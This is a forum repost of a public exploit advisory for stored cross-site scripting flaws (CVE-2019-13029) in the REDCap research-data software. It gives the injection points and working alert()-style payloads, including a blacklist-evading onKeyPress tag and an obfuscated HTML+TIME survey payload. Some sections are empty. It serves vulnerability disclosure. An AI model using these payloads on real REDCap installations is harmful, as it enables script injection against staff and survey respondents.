REDCap Cross Site Scripting

#227
Topic created · 1 Posts · 0 Views
  • REDCap versions prior to 9.1.2 suffer from a cross site scripting vulnerability.
    MD5 | a514baa5eac983b54a70b38657784e03
    Download

    # Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting  
    # Date: 2019-07-19  
    # Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France  
    # Vendor Homepage: https://projectredcap.org  
    # Software Link: https://projectredcap.org  
    # Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2  
    # Tested on: 9.1.0  
    # CVE: CVE-2019-13029  
    # Security advisory: https://gitlab.com/snippets/1874216  
    ### Stored XSS n°1 – Project name (found by Dylan GARNAUD)  
    Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.  
    - Where? In project name  
    - Payload: `<BODY onKeyPress=alert("xss")>`  
    - Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.  
    - Privileges: It requires admin privileges to store it.  
    - Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified  
    ### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)  
    - Where? Calendar event  
    - Payload: `<BODY onKeyPress=alert("xss")>`  
    - Privileges: It requires admin privileges to store it.  
    - Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12  
    ### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)  
    - Where? Wherever there is a CSV upload feature with displayed parsed results  
    - Payload:  
    ```csv  
    record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete  
    <script>alert("upload xss")</script>,,  
    
    • Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
    • Privileges: It requires admin privileges to store it.
    • URL examples of execution:

    Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)

    Stored XSS n°5 – Survey (found by Alexandre ZANNI)

    • Where? In the survey management system.
    • Store: One has to select a project, go in the Designer section, choose Survey Settings and then store the payload in the WYSIWYG editor section named Survey Instructions (the same happens for Survey Completion Text).
    • Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
    • Payload:
    <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML>  
    
    • Privileges:
    • Store: It requires admin privileges to store it.
    • Execute: Any unauthenticated user that can consult a survey.
    **Source:** [packetstormsecurity.com](https://packetstormsecurity.com/files/153691/redcap-xss.txt)
Log in to reply